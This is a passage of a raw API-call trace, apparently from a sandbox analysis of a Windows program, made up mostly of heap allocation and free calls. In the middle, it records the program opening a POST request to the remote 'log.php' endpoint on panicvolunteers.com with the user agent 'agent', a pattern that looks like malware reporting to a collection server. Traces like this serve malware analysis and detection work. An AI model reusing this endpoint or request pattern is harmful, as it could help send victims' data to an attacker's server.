[0258.898] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda300 | out: hHeap=0xbc0000) returned 1 [0258.899] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0258.899] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda300 [0258.899] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda450 | out: hHeap=0xbc0000) returned 1 [0258.899] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda4c8 | out: hHeap=0xbc0000) returned 1 [0258.899] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda468 | out: hHeap=0xbc0000) returned 1 [0258.899] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda408 | out: hHeap=0xbc0000) returned 1 [0258.899] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda480 | out: hHeap=0xbc0000) returned 1 [0258.899] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda420 | out: hHeap=0xbc0000) returned 1 [0258.899] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda438 | out: hHeap=0xbc0000) returned 1 [0258.899] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda3c0 | out: hHeap=0xbc0000) returned 1 [0258.899] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda3d8 | out: hHeap=0xbc0000) returned 1 [0258.899] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda3f0 | out: hHeap=0xbc0000) returned 1 [0258.899] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe488 | out: hHeap=0xbc0000) returned 1 [0258.899] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda3f0 [0258.899] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b28 [0258.899] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x18) returned 0xceca78 [0258.899] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xa) returned 0xcda3d8 [0258.899] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xc02980, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x7df468*="Open", cNames=0x1, lcid=0x800, rgDispId=0x7df56c | out: rgDispId=0x7df56c*=1) returned 0x0 [0258.899] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda3d8 | out: hHeap=0xbc0000) returned 1 [0258.899] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0xc02980, iTInfo=0x0, lcid=0x800, ppTInfo=0x7df460 | out: ppTInfo=0x7df460*=0xc18e14) returned 0x0 [0258.906] ITypeInfo:RemoteGetTypeAttr (in: This=0xc18e14, ppTypeAttr=0x7df458, pDummy=0x356310 | out: ppTypeAttr=0x7df458, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.906] ITypeInfo:LocalGetIDsOfNames (This=0xc18e14) returned 0x0 [0258.906] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x0, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.909] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xc25fa0 [0258.909] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x1, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.909] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xbfb318 [0258.909] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x2, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.909] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xbfb318 [0258.909] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x3, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.909] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xc25fa0 [0258.909] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x4, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.909] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xc25fa0 [0258.909] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x5, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.909] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdc5ff0 [0258.909] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x6, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.909] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.909] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x7, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.909] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xc25fa0 [0258.909] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x8, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.909] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xc25fa0 [0258.909] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x9, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.909] ITypeInfo:LocalReleaseTypeAttr (This=0xc18e14) returned 0xdaa568 [0258.909] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xc25fa0 [0258.909] WinHttpRequest:IUnknown:Release (This=0xc18e14) returned 0x1 [0258.909] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x44) returned 0xdf56c0 [0258.910] WinHttpRequest:IDispatch:Invoke (in: This=0xc02980, dispIdMember=1, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x7df550*(rgvarg=([0]=0xdf56c4*(varType=0xb, wReserved1=0x0, wReserved2=0x5fa4, wReserved3=0xc2, varVal1=0x0, varVal2=0x0), [1]=0xdf56d4*(varType=0x8, wReserved1=0xde, wReserved2=0x0, wReserved3=0x0, varVal1="https://panicvolunteers.com/bgr/log/log.php", varVal2=0x0), [2]=0xdf56e4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x7df518, puArgErr=0x7df560 | out: pDispParams=0x7df550*(rgvarg=([0]=0xdf56c4*(varType=0xb, wReserved1=0x0, wReserved2=0x5fa4, wReserved3=0xc2, varVal1=0x0, varVal2=0x0), [1]=0xdf56d4*(varType=0x8, wReserved1=0xde, wReserved2=0x0, wReserved3=0x0, varVal1="https://panicvolunteers.com/bgr/log/log.php", varVal2=0x0), [2]=0xdf56e4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x7df518*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x7df560*=0x2b5995) returned 0x0 [0258.913] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xceca78 | out: hHeap=0xbc0000) returned 1 [0258.913] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda348 [0258.913] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda2e8 [0258.913] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01a78 [0258.913] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xdf56c0 | out: hHeap=0xbc0000) returned 1 [0258.913] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda3f0 | out: hHeap=0xbc0000) returned 1 [0258.913] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0258.913] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda3f0 [0258.913] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda348 | out: hHeap=0xbc0000) returned 1 [0258.914] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda510 | out: hHeap=0xbc0000) returned 1 [0258.914] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0258.914] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda3a8 | out: hHeap=0xbc0000) returned 1 [0258.914] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda390 | out: hHeap=0xbc0000) returned 1 [0258.914] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xd9b998 | out: hHeap=0xbc0000) returned 1 [0258.914] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01ad8 | out: hHeap=0xbc0000) returned 1 [0258.914] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda360 | out: hHeap=0xbc0000) returned 1 [0258.914] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda378 | out: hHeap=0xbc0000) returned 1 [0258.914] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda300 | out: hHeap=0xbc0000) returned 1 [0258.914] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe4b0 | out: hHeap=0xbc0000) returned 1 [0258.914] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0258.914] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda2e8 | out: hHeap=0xbc0000) returned 1 [0258.914] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01a78 | out: hHeap=0xbc0000) returned 1 [0258.914] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda3f0 | out: hHeap=0xbc0000) returned 1 [0258.914] PeekMessageW (in: lpMsg=0x7dfb5c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb5c) returned 0 [0258.914] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01a78 [0258.914] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda3f0 [0258.914] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b58 [0258.914] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda3f0 | out: hHeap=0xbc0000) returned 1 [0258.914] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xe3a020 [0258.914] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe4b0 [0258.914] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcda3f0 [0258.914] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda2e8 [0258.914] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcda300 [0258.914] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcda378 [0258.914] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda360 [0258.914] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcda390 [0258.914] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01ad8 [0258.914] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda3a8 [0258.914] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01ad8 | out: hHeap=0xbc0000) returned 1 [0258.915] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xde6e68 [0258.915] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda510 [0258.915] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda348 [0258.915] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01ad8 [0258.915] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda3a8 | out: hHeap=0xbc0000) returned 1 [0258.915] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda3a8 [0258.915] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01ad8 | out: hHeap=0xbc0000) returned 1 [0258.915] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcdaa38 [0258.915] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda2b8 [0258.915] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda3a8 | out: hHeap=0xbc0000) returned 1 [0258.915] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda2e8 | out: hHeap=0xbc0000) returned 1 [0258.915] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda3f0 | out: hHeap=0xbc0000) returned 1 [0258.915] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda300 | out: hHeap=0xbc0000) returned 1 [0258.915] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda360 | out: hHeap=0xbc0000) returned 1 [0258.915] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda378 | out: hHeap=0xbc0000) returned 1 [0258.915] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda390 | out: hHeap=0xbc0000) returned 1 [0258.915] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe4b0 | out: hHeap=0xbc0000) returned 1 [0258.915] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda390 [0258.915] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01ad8 [0258.915] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x18) returned 0xceca78 [0258.915] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x22) returned 0xded840 [0258.915] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xc02980, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x7df468*="SetRequestHeader", cNames=0x1, lcid=0x800, rgDispId=0x7df56c | out: rgDispId=0x7df56c*=2) returned 0x0 [0258.915] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xded840 | out: hHeap=0xbc0000) returned 1 [0258.915] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0xc02980, iTInfo=0x0, lcid=0x800, ppTInfo=0x7df460 | out: ppTInfo=0x7df460*=0xc18e14) returned 0x0 [0258.916] ITypeInfo:RemoteGetTypeAttr (in: This=0xc18e14, ppTypeAttr=0x7df458, pDummy=0x356310 | out: ppTypeAttr=0x7df458, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.916] ITypeInfo:LocalGetIDsOfNames (This=0xc18e14) returned 0x0 [0258.916] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x0, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.916] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdc5ff0 [0258.916] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x1, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.916] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xbfb318 [0258.916] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x2, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.916] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xbfb318 [0258.916] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x3, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.916] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdc5ff0 [0258.916] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x4, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.916] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdc5ff0 [0258.916] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x5, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.916] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdc5ff0 [0258.916] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x6, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.916] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdd5120 [0258.916] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x7, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.916] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdc5ff0 [0258.916] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x8, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.916] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdc5ff0 [0258.916] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0x9, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.916] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdc5ff0 [0258.916] ITypeInfo:RemoteGetFuncDesc (in: This=0xc18e14, index=0xa, ppFuncDesc=0x7df45c, pDummy=0x356310 | out: ppFuncDesc=0x7df45c, pDummy=0x356310*=0x3225e4) returned 0x0 [0258.916] ITypeInfo:LocalReleaseTypeAttr (This=0xc18e14) returned 0xdaa568 [0258.916] ITypeInfo:LocalReleaseFuncDesc (This=0xc18e14) returned 0xdc5ff0 [0258.916] WinHttpRequest:IUnknown:Release (This=0xc18e14) returned 0x1 [0258.916] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x34) returned 0xe2bf18 [0258.917] WinHttpRequest:IDispatch:Invoke (in: This=0xc02980, dispIdMember=2, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x7df550*(rgvarg=([0]=0xe2bf1c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="agent", varVal2=0x0), [1]=0xe2bf2c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="User-Agent", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x7df518, puArgErr=0x7df560 | out: pDispParams=0x7df550*(rgvarg=([0]=0xe2bf1c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="agent", varVal2=0x0), [1]=0xe2bf2c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="User-Agent", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x7df518*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x7df560*=0x2b5995) returned 0x0 [0258.917] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xceca78 | out: hHeap=0xbc0000) returned 1 [0258.917] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda3f0 [0258.917] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda2e8 [0258.917] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b28 [0258.918] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe2bf18 | out: hHeap=0xbc0000) returned 1 [0258.918] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda390 | out: hHeap=0xbc0000) returned 1 [0258.918] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01ad8 | out: hHeap=0xbc0000) returned 1 [0258.918] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda390 [0258.918] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda3f0 | out: hHeap=0xbc0000) returned 1 [0258.918] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xe3a020 | out: hHeap=0xbc0000) returned 1 [0258.918] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0258.918] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda348 | out: hHeap=0xbc0000) returned 1 [0258.918] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda510 | out: hHeap=0xbc0000) returned 1 [0258.918] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda2b8 | out: hHeap=0xbc0000) returned 1 [0258.918] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdaa38 | out: hHeap=0xbc0000) returned 1 [0258.918] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xde6e68 | out: hHeap=0xbc0000) returned 1 [0258.918] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01a78 | out: hHeap=0xbc0000) returned 1 [0258.918] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda2e8 | out: hHeap=0xbc0000) returned 1 [0258.918] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0258.918] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda390 | out: hHeap=0xbc0000) returned 1 [0258.918] PeekMessageW (in: lpMsg=0x7dfb5c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb5c) returned 0 [0258.918] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b28 [0258.918] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda390 [0258.918] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01a78 [0258.918] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda390 | out: hHeap=0xbc0000) returned 1 [0258.918] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xe3a020 [0258.918] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xde6e68 [0258.918] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcda390 [0258.919] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda2e8 [0258.919] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcdaa38 [0258.919] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcda2b8 [0258.919] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda510 [0258.919] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcda348 [0258.919] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0258.919] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda3f0 [0258.919] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0258.919] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xde6e90 [0258.919] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda3a8 [0258.919] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda258 [0258.919] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0258.919] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda3f0 | out: hHeap=0xbc0000) returned 1 [0258.919] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda3f0 [0258.919] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0258.919] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda270 [0258.919] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda930 [0258.919] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda3f0 | out: hHeap=0xbc0000) returned 1 [0258.919] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda2e8 | out: hHeap=0xbc0000) returned 1 [0258.919] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda390 | out: hHeap=0xbc0000) returned 1 [0258.919] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdaa38 | out: hHeap=0xbc0000) returned 1 [0258.919] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda510 | out: hHeap=0xbc0000) returned 1 [0258.919] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda2b8 | out: hHeap=0xbc0000) returned 1 [0258.919] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda348 | out: hHeap=0xbc0000) returned 1 [0258.919] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xde6e68 | out: hHeap=0xbc0000) returned 1 [0258.920] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda348 [0258.920] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b58 [0258.920] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x18) returned 0xceca78 [0258.920] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x22) returned 0xded840 [0258.920] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xc02980, 